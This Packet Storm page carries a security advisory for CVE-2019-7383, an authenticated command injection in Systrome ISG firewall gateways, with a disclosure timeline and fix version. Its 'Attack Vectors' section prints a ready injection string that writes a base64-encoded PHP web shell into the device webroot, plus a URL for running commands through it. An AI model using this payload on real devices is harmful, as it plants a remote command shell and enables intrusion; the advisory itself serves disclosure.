what you don't know can hurt you

SYSTORME ISG Command Injection

SYSTORME ISG Command Injection
Posted Feb 13, 2019
Authored by Kaustubh G. Padwad

SYSTORME ISG products ISG-600C, ISG-600H, and ISG-800W suffer from an authenticated command injection vulnerability.

tags | exploit
advisories | CVE-2019-7383
MD5 | 2b900c12b8546c4e8e5c9f117e930eb6

SYSTORME ISG Command Injection

Change Mirror Download
=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title : Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
1.ISG-600C
2.ISG-600H
3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20181105.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-003


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and smal
l enterprises, branch interconnection, and chain enterprises.

Description:
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware V1.1-R2.1_TRUNK-20181105.bin.
A shell command injection occurs by editing the description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection via the des parameter.

[Additional_information]

The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell command injection.
below is the vulnerable code snipet "<td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text" <?php echo $item['des'];?> size="50" maxlength="<?php echo XML_MAX_DESC_LEN;?>"/><"

[VulnerabilityType Other]
Authenticated Shell Command Injection


[Affected Component]
The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell command injection.
below is the vulnerable code snippet "<td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text" <?

[Attack Type]
Local


[Impact Code execution]
true


[Attack Vectors]

visit the url http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat
adding the strings below will add a php system command shell in the webroot of the device:
'`echo PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4KCg== | base64 -d > /usr/local/wwwroot/cmd.php`'

the php system shell can then be accessed via browser, e.g: http://device_ip/cmd.php?cmd=ifconfig


Mitigation
==========

This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin

Disclosure:
===========
10-Dec-2018 Discoverd the Vulnerability
10-DEC-2018 Reported to vendor
04-JAN-2019 Recived the fixed from vendor
04-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE ID Assign.
08-FEB-2019 Advisiory Published.

[Discoverer]
* Kaustubh Padwad,
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close